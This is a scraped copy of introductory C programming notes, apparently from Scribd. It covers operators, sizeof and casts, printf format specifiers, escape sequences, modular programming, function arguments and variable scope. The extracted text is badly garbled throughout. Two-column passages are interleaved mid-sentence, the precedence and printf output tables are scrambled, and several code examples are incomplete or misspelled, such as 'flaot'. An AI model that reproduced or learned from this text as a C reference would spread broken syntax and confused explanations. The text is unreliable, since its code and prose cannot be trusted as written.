Assignment Operator: Assignment operator assigns the value of expression on the right side of it to the variable on the left of it. The assignment expression evaluates the operand on the right side of the operator (=) and places its value in the variable on the left. Assignment expressions that make use of assignment operator have the form: Identifier = expression; Ex: a = 2; Area = length * width; Note: If the two operands in an assignment expression are of different data types, then the value of the expression on the right side of assignment operator will automatically be converted to the type of the identifier on the left of assignment operator. For example A floating value may be truncated if it is assigned to an integer identifier. A double value may be rounded if it is assigned to a floating point identifier. An integer value may be changed if it is assigned to a short integer identifier or to a character identifier. Unary Operators: The operators that act upon a single operand to produce a new value are known as unary operators. C supports the following unary operators. Operators: Minus operator – Increment operator ++ Decrement operator - - Size operator (type) operator Minus operator – The most common unary operation is a unary minus, where a numerical constant, variable or expression is preceded by a minus sign. It is important to note that the unary minus operation is distinctly different from the arithmetic operator which denotes subtraction (-). The subtraction operator requires two separate operands. The increment operator (++) adds 1 to the operand, whereas the decrement operator (--) subtract 1 from the operand. The increment and decrement operators can each be used in two different ways, depending on whether the operator is written before or after the operand. For example a++; /* operator is written after the operand */ ++a; /* operator is written before the operand */ If the operator precedes the operand (e.g., ++a), then it is called pre-increment operator and the operand will be changed in value before it is used for its intended purpose within the program. On the other hand, if the operator follows the operand (i.e a++), then it is called post-increment operator and the value of the operand will be changed after it is used. sizeof Operator: In C, an operator sizeof is used to calculate size of various datatypes. These can be basic or primitive datatypes present in the language, as well as the ones, created by programmer. The sizeof opearator looks like a function, but it is actually an operator that returns the length, in bytes. It is used to get size of space any data-element/datatype occupies in memory. If type name is used, it always needs to be enclosed in parentheses, whereas variable name can be specified with or without parentheses. Ex: int i; sizeof i; sizeof(int); Rather than let the compiler implicitly convert data, we can convert data from one type to another by using cast operator. To cast data from one type to another it is necessary to specify type in parentheses before the value we want to be converted. For example to convert integer variable count, to a float we code the expression as (float) count; Since cast operator is an unary operator, we must put binary expression to be casted in parentheses to get the correct conversion. For example (float) (a+b) One use of the cast is to ensure that the result of a division is a floating point number. In case of division, proper casting is necessary. Conditional Expressions Simple conditional operations can be carried out with the conditional operator (? :). The conditional operator (? :) is a ternary operator since it takes three operands. The general form of conditional expression is Therefore the result of the conditional operator is the result of whichever expression is evaluated – the first or the second. Only on of the last 2 expressions is evaluated in a conditional expression. Bitwise operators The bitwise operators are the bit manipulation operators. They can manipulate individual bits within the piece of data. These operators can operate on integers and characters but not on floating point numbers or numbers having double data type. & Address Ternary (Conditional) Ternary ? : Right to left 13 Assignment = Addition/Subtraction += -= Assignment Multiplication/Division *= /= Assignment Assignment Right to left 14 Modulus/bitwise AND %= &= assignment Bitwise exclusive/inclusive ^= != OR assignment Bitwise Shift left/right <<= >>= assignment Comma (separate Comma , Expression) Left to right 15 Reading data, processing it and writing the processed data known as information or a result of a program are the essential functions of a program. The C is a functional language. It provides a number of macros and functions to enable the programmer to effectively carry out these input and output operations. Some of the input/output functions / macros in C are 1. getchar() 2. putchar() 3. scanf() 4. printf() 5. gets() 6. puts() The data entered by the user through the standard input device and processed data is displayed on the standard output device. I/O Functions: The Formatted I/O functions allows programmers to specify the type of data and the way in which it should be read in or written out. On the other hand, unformatted I/O functions do not specify the type of data and the way is should be read or written. Amongst the above specified I/O functions scanf() and printf() are formatted I/O functions. Function Formatted Unformatted Input scanf() getchar(),gets() C provides the printf function to display the data on the monitor. This function can be used to display any combination of numerical values, single characters and strings. The general form of printf statement Function name Function arguments %c Single character There are certain letters which may be used as prefix for certain placeholders. These are h: the h letter can be applied to d,i,o,u and x placeholders. The h letter tells printf() to display short integers. As an example, %hu indicates that the data is of type short unsigned integer. l: the l letter can be applied to d,i,o,u and x placeholder. The l letter tells printf() to display long integers. As an example, %ld indicates that the data is of type long integer. When it is applied to f, it indicates double data type. We have seen that how integer numbers can be displayed on the monitor using %d placeholder. In case of integer numbers, the placeholder can accept modifiers to specify the minimum field width and left justification by default, all output is right justified. We can force the information to be left justified by putting a minus sign directly after the %. For example printf statement Output (assume x=1234) 1 2 3 4 printf(“%d”,x); 1 2 3 4 printf(“%6d”,x); Right justified 1 2 3 4 printf(“%-6d”,x); Left justified. 1 2 3 4 printf(“%3d”,x); Overriding the minimum field width 0 0 1 2 3 4 printf(“%06d”,x); Padding with zeros. 0 0 1 2 3 4 printf(“%06d”,x); Padding with zeros Formatting floating point output In case of floating point numbers placeholder can accept modifiers that specify the minimum field width, precision and left justification. To add a modifier we have to place a decimal point follower by the precision after the field width specifier. For e and f formats, the precision modifier determines the number of decimal places to be displayed. For example %8.4f will display a number at least 8 characters wide including decimal point with four decimal places. 3 4 5 6 . 1 2 0 6 5 0 printf(“%f”,x); Default precision is 6 3 4 5 6 . 1 2 printf(“%7.2f”,x); 3 4 5 6 . 1 2 printf(“%9.2f”,x); Right justified 3 4 5 6 . 1 2 printf(“%-9.2f”,x); left justified 3 . 4 5 6 E + 0 3 printf(“%9.3e”,x); When the precision is applied to strings, the number preceding period specifies the minimum field width and the number following the period specifies the number of characters of the string to be displayed. For examples %16.9s will display a string that will be at least sixteen characters long; however only first nine characters from the string are displayed with remaining blank characters. Let us see the important points related to formatted string display. When minimum field width is specified without negative sign, display is right justified. When only minimum field width is specified and it is less than the actual string length, the minimum field width is overridden and complete string is displayed. We can insert negative sign before minimum field width to get left justified display. T H I S I S A T E S T S T R I N G printf(“%s”,str); T HI S I S A T ES T S T R I NG printf(“%24s”, str); T H I S I S A T ES T printf(“%24.14s ”,str); The backslash symbol( \ ) is known as escape character. Since the newline character and the tab character begin with backslash they are called escape sequences. They are Escape Function Sequences Newline : Displays the message or variable values following it on \n the next line. Tab: Moves cursor to the next tab \t Functions In structural programming, the program is divided into small independent tasks. These tasks are small enough to be understood easily without having to understand the entire program at once. Each task is designed to perform specific functionality on its own. When these tasks are performed, their outcomes are combined together to solve the problem. Such a structural programming can be implemented using modular programming. In modular programming, the program is divided into separate small programs called modules. Each module is designed to perform specific function. Modules make out actual program shorter, hence easier to read and understand.. Main Module The main module is known as a calling module because it has submodule. Each of the sub module is known as called modules. However, modules 1, 2 and 3 also have sub modules therefore they are also calling modules. The communication between modules in a structure chart is allowed only through a calling module. If module 1 need to send data to module 2, the data must be passed through the calling module, main module. No communication can take place directly between modules that do not have a clling-called relationship. This means that in a structural chart, a module can be called by one and only one higher module. There are several advantages of modular / structural programming, some of them are Easy Debugging: Since each function is smaller and has a logical clarity, it is easy to locate and correct errors in it. Basics of Functions Ex: #include <stdio.h> Ex: The following is function that computes the xn for given values of x and n. for(k=1;k<=n;k++) p=p*x; return p; } The function is called from another function. For example, we can call the above function form main(). This function returns the value of xn. power(x,n); Depending upon whether arguments are passed or not, and whether a value from the function is returned or not, can be classified into the following four categories. float power(float,int); The arguments passing from the calling function are known as actual parameters; the parameters in the called function are named as formal parameters. The following is an example: If we call power(x,n) from the main(), then the actual arguments are x and n. In the called function, float power(float p, int q), p and q are formal argument or parameters. After execution of this function, the function returns a float-point value to the calling function. When a function is called, the data is A function definition starts with the type passed from a calling function as of the function. The function name is arguments. These arguments are known followed by a list of argument declaration as actual arguments. Following is an within parentheses. The arguments act as example of calling function. placeholders for values that are passed when function is called. These are called main() formal arguments. A function example: { float func(float,int); float func(float y, int m) …… { func(x,n); …….. …… return …..; } } The names of the formal arguments The actual and formal arguments must need not be the same as the names of the match in number, type and order. actual arguments. Actual arguments must be assigned The values of the actual arguments are values before a function call is made. assigned to the formal variables on a one- to-one basis. When a function call is made, only a copy of the values of actual arguments is The formal arguments y and m are local to passed to the called function. The the function. processing inside the called function does not have any effect on the variables used in the actual argument list. The global variables are declared The variables declared within a function outside a function. These variables are are called local variables. Their scope and available to all the functions of a life-time exists as long as the execution of program. Example the function. Local variables vanish when function is terminated. int a,b,c; /* global variable */ main() int func1() { { ….. flaot x,y; /* local variables */ Func1(); ........ Func2(); x=a+b ; } y=b*c+10 ; ......... When we declare variables as global, } they are automatically initialized to zero in case of numeric variables, and null in Local variables contain garbage values if case of character variables. they are not initialized.
https://www.scribd.com/document/405725552/c-notes
CC-MAIN-2019-30
refinedweb
2,972
55.13
(This article was first published on Naught Not Knot, and kindly contributed to R-bloggers). Note that I’m not using the R(D)COM package, but the RdotNET package found here. It’s open source (thanks for the correction, Carlitos) closed source, unfortunately, and I’ve noted bugs when consuming with F# (which I may do a write-up, if I’m more successful with it – I could be Doing It Wrong). The Source, Luke: 1: using System; 2: using System.Linq; 3: using RDotNet; 4: 5: namespace R.NET_Wrapper 6: { 7: class Program 8: { 9: public static void Main(string[] args) 10: { 11: //Console.WriteLine("Hello World!"); 12: // Point the R Engine to the dll dir 13: RDotNet 14: .REngine 15: .SetDllDirectory( 16: @"C:\Program Files\R\R-2.12.1\bin\i386" 17: ); 18: 19: // make an instance, go ahead, do it 20: using 21: (REngine engine = 22: REngine 23: .CreateInstance("RInstance") 24: ) 25: { 26: // Let's see what it'll do. 27: // Let's create a numeric vector with a double[] 28: // .NET framework array to vector 29: NumericVector group1 = 30: engine.CreateNumericVector( 31: new double[] { 32: 30.02, 33: 29.99, 34: 30.11, 35: 29.97, 36: 30.01, 37: 29.99 38: }); 39: engine 40: .SetSymbol("group1", group1); // Dont forget this! 41: 42: // Here's the sssllooww way 43: NumericVector group2 = 44: engine 45: .EagerEvaluate( 46: "group2 <- c(29.89, 29.93, 29.72, 29.98, 30.02, 29.98)") 47: .AsNumeric(); 48: // EagerEvaluate will also accept IO.Stream (R scripts, anyone?) 49: 50: // Test difference of mean (student's t-test) and get P-value 51: GenericVector testResult = 52: engine 53: .EagerEvaluate("t.test(group1, group2)") 54: .AsList(); 55: double p = 56: testResult["p.value"] 57: .AsNumeric() 58: .First(); 59: 60: Console.WriteLine( 61: "Group 1 [{0}]", 62: string.Join( 63: ", ", 64: group1.Select(i => i.ToString())) 65: ); 66: Console.WriteLine( 67: "Group 2 [{0}]", 68: string.Join( 69: ", ", 70: group2.Select(i => i.ToString()) 71: ) 72: ); 73: Console.WriteLine("P-value = {0:0.000}", p); 74: } 75: 76: 77: //+ TODO: finish getting data into managed space 78: 79: Console.Write("Press any key to continue . . . "); 80: Console.ReadKey(true); 81: } 82: } 83: }...
https://www.r-bloggers.com/consuming-rdotnet/
CC-MAIN-2017-09
refinedweb
371
71.61
Cloud DNS View documentation for this product.. Features Authoritative DNS lookup Cloud DNS translates requests for domain names like into IP addresses like 74.125.29.101. Fast anycast name servers Scalability and availability Cloud DNS can support a very large number of zones and DNS records per zone. Contact us if you need to manage millions of zones and DNS records. Our SLA promises 100% availability of our authoritative name servers. Zone and project management Create managed zones for your project, then add, edit, and delete DNS records. You can control permissions at a project level and monitor your changes as they propagate to DNS name servers. Manage through API and web UI Private zones Private DNS zones provide an easy-to-manage internal DNS solution for your private GCP networks, eliminating the need to provision and manage additional software and resources. And since DNS queries for private zones are restricted to a private network, hostile agents can’t access your internal network information. DNS forwarding If you have a hybrid-cloud architecture, DNS forwarding can help bridge your on-premises and GCP DNS environments. This fully managed product lets you use your existing DNS servers as authoritative, and intelligent caching makes sure your queries are performed efficiently—all without third-party software or the need to use your own compute resources. Cloud Logging Private DNS logs a record for every DNS query received from VMs and inbound forwarding flows within your networks. You can view DNS logs in Cloud Logging and export logs to any destination that Cloud Logging export supports. DNS peering DNS peering makes available a second method of sharing DNS data. All or a portion of the DNS namespace can be configured to be sent from one network to another and, once there, will respect all DNS configuration defined in the peered network. Technical resources. Query traffic costs If you pay in a currency other than USD, the prices listed in your currency on Cloud Platform SKUs apply. Take the next step Get $300 in free credits to learn and build on Google Cloud for up to 12 months.
https://cloud.google.com/dns/?hl=ru
CC-MAIN-2020-16
refinedweb
354
59.43
Created on 2014-03-28 01:38 by progfou, last changed 2016-10-21 21:02 by ztane. In Python version 2.x and at least 3.2 there no Vietnamese encoding support for TCVN 5712:1993. This encoding is currently largely used in Vietnam and I think it would be usefull to add it to the python core encodings. I already wrote some codec code, based on the codecs already available, that I successfully used in real life situation. I would like to give it as a contribution to Python. Some comments: * Please provide some background information how widely the encoding is used. I get less than 1000 hits in Google when looking for "TCVN 5712:1993". Now, the encoding was a standard in Vietnam, but it has been updated in 1999 to TCVN 5712:1999. There's also an encoding called VSCII. * In the file you write "kind of TCVN 5712:1993 VN3 with CP1252 additions". This won't work, since we can only accept codecs which are based on set standards. It would be better to provide a link to an official Unicode character set mapping table and then use the gencodec.py script on this table. * For Vietnamese, Python already provides cp1258 - how much is this encoding used in comparison to e.g. TCVN 5712:1993 ? Resources: * Vietnamese encodings: * East Asian encodings: Retargeting to 3.5, since all other releases don't allow addition of new features. > * Please provide some background information how widely the encoding is used. I get less than 1000 hits in Google when looking for "TCVN 5712:1993". Here is the background for the need for this encoding. The recent laws[0] in Vietnam have set TCVN 6909:2001 (Unicode based) as the standard encoding everybody should use. Still, there was more than 30 old Vietnamese encodings that were used for tenths of years before that, with some of them being still used (it takes times for people to accept the change and for technicians to do what's required to change technology). Among them, TCVN 5712:1993 was (is) mostly used in the North of Vietnam and VNI (a private company encoding) in the South of Vietnam. Worse than that, these old encodings use the C0 bank to store some Vietnamese letters (especially the 'ư', one of the most used in this language), which has the very unpleasant consequence to let some software (like OpenOffice/LibreOffice) being unable to render the texts correctly, even when using the correct fonts. Since this was a showstopper for Free Software adoption in Vietnam, I decided at that time to create a tool[1][2] to help in converting from these old encodings to Unicode. The project was then endorsed by the Ministry of Sciences and Technology of Vietnam, which asked me to make further developments[3]. Even if these old encodings are, hopefully, not the widest used in Vietnam now, there are still tons/plenty of old documents (sorry, I can't be more precise on the volume of administrative or private documents) that need to be read/modified or, best, converted to Unicode; and here is where the encodings are needed. Now every time some Vietnamese people (and Laotian people, I'll come back on this in another bug report) want to use OpenOffice/LibreOffice and still be able to open their old documents, they have to install this Python extension for this. I foresee there will be not only plain documents to convert but also databases and other kind of data storage. And here is where Python has a great occasion to become the tool of choice. [0] [1] [2] [3] > Now, the encoding was a standard in Vietnam, but it has been updated in 1999 to TCVN 5712:1999. I have to admit I missed this one. It may explain the differences I saw when I reversed engineered the TCVN encoding through the study the documents Vietnamese users provided to me. I will check this one and come back with more details. > There's also an encoding called VSCII. VSCII is the same as TCVN 5712:1993. This page contains interesting information about these encodings: > * In the file you write "kind of TCVN 5712:1993 VN3 with CP1252 additions". This won't work, since we can only accept codecs which are based on set standards. I can understand that and I'll do my best to check if it's really based on one of the TCVN standards, be it 5712:1993 or 5712:1999. Still, after years of usage, I know perfectly that it's exactly the encoding we need (for the North part of Vietnam at least). > It would be better to provide a link to an official Unicode character set mapping table and then use the gencodec.py script on this table. I saw a reference to this processing tool in the Python provided encodings and tried to find a Unicode mapping table at the Unicode website but failed up to now. I'll try harder. > * For Vietnamese, Python already provides cp1258 - how much is this encoding used in comparison to e.g. TCVN 5712:1993 ? To be efficient at typing Vietnamese, you need a keyboard input software (Vietkey and Unikey being the most used). Microsoft tried to create dedicated Vietnamese encoding (cp1258) and keyboard, but I never saw or heard about its adoption at any place. Knowing the way Vietnamese users use their computer, I would say it probably has never been in real use. > * Vietnamese encodings: In this sentence you can see the most used old encodings in Vietnam: “On the Linux platform, fonts based on Unicode [6], TCVN, VNI and VPS [7] encodings can be adequately used to input Vietnamese text.” This is not only the most used on Linux (in fact, on Linux we have to use Unicode, mostly because of the problem I explained before) but also on Windows. I don't know the situation for Mac OS or other OS though. My goal is to add these encodings into Python, to help Vietnam make its steps into Unicode. > * East Asian encodings: This document tells: “Context is critical—Unicode is considered the “newer” character set in the context of this talk.” It was written in the goal to put Unicode as a replacement for all already covered charsets, which then shall become obsolete. So, of course, in this point of view, every 8 bits Vietnamese charsets are obsolete. But it doesn't mean there are not of use anymore, not at all! Thanks for your answers. I think the best way forward would be to some up with an official encoding map of the TCVN 5712:1999 encoding, translate that into a format that gencodec.py can use and then add the generated codec to Python 3.5. We can then add the reference to the original encoding map to the generated file. This is how we've added a couple of other encodings for which there were no official Unicode mapping files as well. Please also provide a patch for the documentation and sign the Python contrib form: Thanks, -- Marc-Andre Lemburg eGenix.com I will prepare the official encoding map(s) based on the standard(s). I'll also have to check which encoding correspond to my current encoding map, since this is the one useful in real life. > Please also provide a patch for the documentation I currently have no idea how to do this. Could you point me to a documentation sample or template please? > and sign the Python contrib form: > I did it yesterday. The form tells it can take days to be integrated, but I did receive the signed document as a confirmation. Thanks for your concern, J.C. A note to inform about my progress. (I had a long period without free time at hand) While seeking (again) official documents on the topic, I mainly found a lot of non-official ones, but some are notorious enough to use them as references. I am now in the process of creating the requested patch. I am currently studying the proper way to do it. I expect to get it ready this weekend, in the hope to have it accepted for Python 3.5. I failed to find anything about TCVN 5712:1999 except the official announcement of it superseding TCVN 5712:1993 on TCVN's website. I also was not able to find any material using TCVN 5712:1999. My guess is that TCVN 6909:2001 having been released only 2 years after, TCVN 5712:1999 probably had no time to get in real use. Anyway, TCVN 5712:1993 is the real one, the one having been in used for almost 2 decades. So this is why I provided codec tables for this one. There is 3 flavors of it. The most used one for documents is the third one (TCVN 5712:1993 VN3). It is used with the so called “ABC fonts” which are of common knowledge in Vietnam. But the first one may be of use in databases. I never got access to real (large) Vietnamese databases so I can't confirm it for sure. I still provided the 3 flavors, just in case. Still, since VN3 is a subset of VN2, which itself is a subset of VN1, you may choose to only include the first one, TCVN 5712:1993 VN1, I leave this up to you. FYI, GNU Recode and Glibc Iconv currently implement "tcvn" as VN1. (but the Epson printer company implement VN3…) Marc-Andre, about “Please also provide a patch for the documentation”, could you please guide me on this? I can write some documentation, but I simply don't know in what form you expect it. Could you point me to some examples please? Jean Christophe: Please have a look at the patch for ticket as example of the doc patch. Thanks. Or issue22682. Needed: * The codec itself (in Lib/encodings/ directory). * Entries in aliases table (Lib/encodings/aliases.py). * A row in encodings table (Doc/library/codecs.rst). * An entry in What's New (Doc/whatsnew/3.5.rst). * May be addition in encodings table in Lib/locale.py. May be regenerate aliases table. * An entry in all encodings list (Lib/test/test_codecs.py) and mentions in some other tests (Lib/test/test_unicode.py, Lib/test/test_xml_etree.py). Here this is a patch to added vietnamese codec tcvn. I am not sure about the name of the codecs...tcvn5712, tcvn5712_3 ? test_xml_etree, test_codesc, test_unicode is running. Is it enough for the doc? Since no Unicode mapping table is found at the Unicode website, we need at least the link to public official document that specifies the encoding. If VN3 is a subset of VN2, which itself is a subset of VN1, VN1 definitely looks the most preferable choice for including in Python distribution. Especially if it was chosen by other popular software. I found the full document on SlideShare: As far as I can understand, they're "subsets" of each other only in the sense that VN1 has the widest mapping of characters, but this also partially overlaps with C0 and C1 ranges of control characters in ISO code pages - there are 139 additional characters! VN2 then lets the C0 and C1 retain the meanings of ISO-8859 by sacrificing some capital vowels (Ezio perhaps remembers that Italy is Ý in Vietnamese - sorry, can't write it in upper case in VN2). VN3 then sacrifices even more for some more spaces left for possibly application-specific uses (the standard is very vague about that); The text of the standard is copy-pasteable at - however, it lacks some of the tables. The standard additionally has both UCS-2 mappings and Unicode names of the characters, but they're in pictures; so it would be preferable to get the mapping from the iconv output, say. Ah there was something that I overlooked before - the VN1 and VN2 both have combining accents too. If I read correctly, the main letter should precede the combining character, just as in Unicode; VN3 seems to lack combining characters altogether. Thus, for simple text conversion from VN* to Unicode, VN1 should be enough, but some VN2/VN3 control/application specific codes might show up as accented capital letters. --- The following script rips the table from iconv: import subprocess mapping = subprocess.run('iconv -f TCVN -t UTF-8'.split(), input=bytes(range(256)), stdout=subprocess.PIPE).stdout.decode() There were several aliases but all of them seemed to produce identical output. Output matches the VN1 from the tables. And the luatvn.net additionally *did* have a copyable VN1 - UCS2 table
http://bugs.python.org/issue21081
CC-MAIN-2017-04
refinedweb
2,112
71.65
use the watch emulator in Android Studio to test your app with different screen shapes and sizes. Set up your environment Install the latest version of Android Studio. For information about creating apps in Android Studio, see Projects overview. Use the SDK manager to confirm that you have the latest version of the Android platform. Specifically, under the SDK Platforms tab, select Android 8.0 (Oreo). If you plan to make your Wear OS apps available for China, see Create Wear OS apps for China. Create a Wear OS app You can create a Wear OS app using Android Studio's New Project wizard. Start a Wear OS project To create a project in Android Studio: - Click File > New > New Project. - 'com.android.support:wear:27.1.1' implementation 'com.google.android.support:wearable:2.3.0' compileOnly 'com.google.android.wearable:wearable:2 AVD. Confirm that you have the latest version of the Android SDK Platform-tools from the SDK Manager. Configure an AVD and run your app as follows: - In Android Studio, open the Android Virtual Device Manager by selecting Tools > AVD Manager. - Click Create Virtual Device. - In the Category pane, select Wear and choose a hardware profile. Click Next. - Select the O image to download. For example, select the image with the Release Name of O, the API Level of 26, and the Target of "Android 8.0 (Wear OS)". Click Next and then click Finish. - Close the Android Virtual Device Manager. - In Android Studio, click the Run button. - Select the new AVD, and click OK. The AVD starts and, after a few moments, runs your app. A "Hello..." message is displayed. For more information about using AVDs, see Run apps on the Android emulator. Pair a phone with the watch AVD up a phone. - On the phone, enable Developer Options and USB Debugging. - Connect the phone to your computer through USB. - Forward the AVD's communication port to the connected phone (each time the phone is connected): adb -d forward tcp:5601 tcp:5601 - On the phone, in the Wear OS app, begin the standard pairing process. For example, on the Welcome screen, tap the Set It Up button. Alternatively, if an existing watch already is paired, in the upper-left drop-down, tap Add a New Watch. - On the phone, in the Wear OS app, tap the Overflow button, and then tap Pair with Emulator. - Tap the Settings icon. - Under Device Settings, tap Emulator. - Tap Accounts and select a Google Account, and follow the steps in the wizard to sync the account with the emulator. If necessary, type the screen-lock device password, and Google Account password, to start the account sync. Wi-Fi or Bluetooth. Enable adb debugging on the watch: - Open the Settings menu on the watch. - Scroll to the bottom of the menu. If no Developer options item is provided, tap System and then About. - Tap the build number 7 times. - From the Settings menu, tap Developer options. - Enable ADB debugging. Connect the watch: - Connect the watch to your machine through USB, so you can install apps directly to the watch. about updating a phone with the latest Wear OS companion app. Use the Android version of the companion app On an Android phone, go to the Wear OS app listing. Tap Update to download and install the app. After installation, confirm that Auto-update is selected for the app (see the "Set up automatic updates for specific apps" section of Update downloaded apps). Tap Open to start the app. Pair an Android phone to a watch After you install the companion app on a phone, unpair ("Forget") any obsolete watch pairings, if necessary. Then you can pair the phone to a newly-imaged watch: - On the phone, select your device name from the list of devices. A pairing code is displayed on the phone and on the watch. Ensure that the codes match. - Tap Pair to continue the pairing process. When the watch is connected to the phone, a confirmation message is displayed. On the phone, a screen is displayed that lists the accounts on the phone. - Choose a Google Account to add and sync to your watch. - Confirm the screen lock and enter the password to start the copying of the account from the phone to the watch. - Follow the instructions in the wizard to finish the pairing process. Companion app for iPhones An iOS companion app is available but the phone on which the app is installed must be running iOS 8.2 or higher: - On your iPhone, visit the App Store and download and install the Wear companion app on your iPhone. - Follow the instructions on the watch and on the phone to begin the pairing process. For additional information, see the related Help page. Add a Wear OS module to your project You can add a module for a Wear OS device to your existing project in Android Studio, enabling you to reuse code from your mobile (phone) app. Provide a Wear OS module in your existing project To create a Wear OS module, open your existing Android Studio project and do the following: - Click File > New > New Module. - In the New Module window, select Wear OS Module and click Next. - Under Configure the new module, enter: - Application/Library Name: This string is the title of your app launcher icon for the new module. - Module Name: This string is the name of the folder for your source code and resource files. - Package Name: This string is the Java namespace for the code in your module. The string is added as the packageattribute in the module's Android manifest file. - Minimum SDK: Select the lowest version of the platform that the app module supports. For example, select API 26: Android 8.0 (Oreo). This value sets the minSdkVersionattribute in the build.gradlefile, which you can edit later. - Click Next. Options that include code templates are displayed. Click Blank Wear Activity and click Next. - In the Configure Activity window, enter or accept the default values for the Activity Name, Layout Name, and Source Language. Click Finish. Android Studio creates and syncs the files for the new module. Android Studio also adds any required dependencies for Wear OS to the new module's build file. The new module appears in the Project window on the left side of the screen. If you don't see the new module's folder, ensure the window is displaying the Android view. In the build.gradle file for the new (Wear OS) module: - In the androidsection, set the values for compileSdkVersionand targetSdkVersionto 26. - Update the dependenciessection to include the following: dependencies { implementation 'com.android.support:wear:27.1.1' implementation 'com.google.android.support:wearable:2.3.0' compileOnly 'com.google.android.wearable:wearable:2.3.0' } - Sync your Android Studio project. To run the code in the new module, see Launch the emulator and run your Wear OS app. Include libraries Note: We recommend using Android Studio for Wear OS development, as it provides project setup, library inclusion, and packaging. When you use Android Studio's Project Wizard, the wizard imports dependencies in the appropriate module's build.gradle file. However, the dependencies are not required for all apps; please review the information below about the dependencies. To update an existing Wear. Play Services and the Wearable Data Layer APIs If your app depends on Google Play Services, either to sync and send data (using the Data Layer APIs) or for other reasons, you need the latest version of Google Play Services. If you are not using these APIs, remove the dependency. Differences between phone and watch apps The following are some of the differences between phone and watch apps: - Watch apps use watch-specific APIs, where applicable (e.g., for circular layouts, wearable drawers, ambient mode, etc.). - Watch apps. Watch apps that can transition into ambient mode are called always-on apps. The following describes the two modes of operation for always-on apps: - Interactive - Use full color with fluid animation in this mode. The app is also responsive to input. - Ambient - Render the screen with black and white.
https://developer.android.com/training/wearables/apps/creating?hl=fr
CC-MAIN-2019-26
refinedweb
1,357
66.74
A simple Django app which implements blacklists Project description This application provide simple blacklist logic for django projects. You can block specific IP-addresses and User Agents for accessing specific page or view-name per HTTP-method. Also, you can configure rules to block users automatically after N requests per datetime.timedelta() and notify site managers about clients which have been blocked! Quick start Add “blacklist” to your INSTALLED_APPS setting like this: INSTALLED_APPS = ( ... 'blacklist', ) Run python manage.py migrate to create the blacklists models. Use blacklisting decorator for views which needs blacklisting logic like this: from blacklist.utils import blacklisting urlpatterns = ( url(r'^view/$', blacklisting(log_requests=True)(my_view), name='log'), ) Configure AUTO_BLOCKING_RULES setting in your settings.py for auto-blocking logic: AUTO_BLOCKING_RULES = ( { 'RULE': { 'ip': '.*', }, 'PERIOD': datetime.timedelta(days=1), 'BLOCK_AFTER': 10, 'ENABLED': True, 'PROPOSAL': True, 'NOTIFY': ( ('Mikhail Nacharov', 'mnach@ya.ru'), ) }, ) And call blacklist.models.RequestLog.objects.create_blocking_rules() periodically to create BlockRules. Please use cron via django-cronjobs or setup django-celery for this purpose. 5. If you need email notification configure django email settings as described in. If you want to send users site where blocking rules have been created you also need to enable and configure django site framework: Requirements This package is compatible with Django 1.7 and 1.8 and can be ran on python 2.7 and higher. Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/django-simple-blacklist/
CC-MAIN-2020-16
refinedweb
250
52.36
Abstract triangle mesh base class. More... #include <mitsuba/render/trimesh.h> Abstract triangle mesh base class. Create a new, empty triangle mesh with the specified state. Unserialize a triangle mesh. Unserialize a triangle mesh. This is an alternative routine, which only loads triangle data (no BSDF, Sub-surface integrator, etc.) in a format that will remain stable as Mitsuba evolves. The files can optionally contain multiple meshes – in that case, the specified index determines which one to load. Create a new triangle mesh. Virtual destructor. Generate smooth vertex normals? Generate per-triangle space basis vectors from a user-specified set of UV coordinates. Will throw an exception when no UV coordinates are associated with the mesh. Build a discrete probability distribution for sampling. Called once while loading the scene Reimplemented from mitsuba::Shape. Create a triangle mesh approximation of this shape. Since instances are already triangle meshes, the implementation just returns a pointer to this. Reimplemented from mitsuba::Shape. Import a shape from the Blender in-memory representation. Return a bounding box containing the mesh. Implements mitsuba::Shape. Return a bounding box containing the mesh. Retrieve this object's class. Reimplemented from mitsuba::Shape. Return the number of primitives (triangles, hairs, ..) contributed to the scene by this shape. Includes instanced geometry Implements mitsuba::Shape. Return the derivative of the normal vector with respect to the UV parameterization. This can be used to compute Gaussian and principal curvatures, amongst other things. Reimplemented from mitsuba::Shape. Return the number of primitives (triangles, hairs, ..) contributed to the scene by this shape. Does not include instanced geometry Implements mitsuba::Shape. Return the total surface area. Reimplemented from mitsuba::Shape. Return the number of triangles. Return the triangle list (const version) Return the triangle list. Return the per-triangle UV tangents (const version) Return the per-triangle UV tangents. Return the vertex colors (const version) Return the vertex colors. Return the number of vertices. Return the vertex normals (const version) Return the vertex normals. Return the vertex positions (const version) Return the vertex positions. Return the vertex texture coordinates (const version) Return the vertex texture coordinates. Does the mesh have UV tangent information? Does the mesh have vertex colors? Does the mesh have vertex normals? Does the mesh have vertex texture coordinates? Load a Mitsuba compressed triangle mesh substream. Query the probability density of samplePosition() for a particular point on the surface. This method will generally return the inverse of the surface area. Reimplemented from mitsuba::Shape. Prepare internal tables for sampling uniformly wrt. area. Reads the header information of a compressed file, returning the version ID. This function assumes the stream is at the beginning of the compressed file and leaves the stream located right after the header. Read the idx-th entry from the offset diccionary at the end of the stream, which has to be open already, given the file version tag. This function modifies the position of the stream. Read the entirety of the end-of-file offset dictionary from the already open stream, replacing the contents of the input vector. If the file is not large enough the function returns -1 and does not modify the vector. This function modifies the position of the stream. Rebuild the mesh so that adjacent faces with a dihedral angle greater than maxAngle degrees are topologically disconnected. On the other hand, if the angle is less than maxAngle, the code ensures that the faces reference the same vertices. This step is very useful as a pre-process when generating high-quality smooth shading normals on meshes with creases. Note: this function is fairly memory intensive and will require approximately three 3x the storate used by the input mesh. It will never try to merge vertices with equal positions but different UV coordinates or vertex colors. Sample a point on the surface of this shape instance (with respect to the area measure) The returned sample density will be uniform over the surface. Reimplemented from mitsuba::Shape. Serialize to a file/network stream. Reimplemented from mitsuba::Shape. Export a Wavefront OBJ version of this file. Export a Stanford PLY version of this file.
http://mitsuba-renderer.org/api/classmitsuba_1_1_tri_mesh.html
CC-MAIN-2020-50
refinedweb
687
53.17
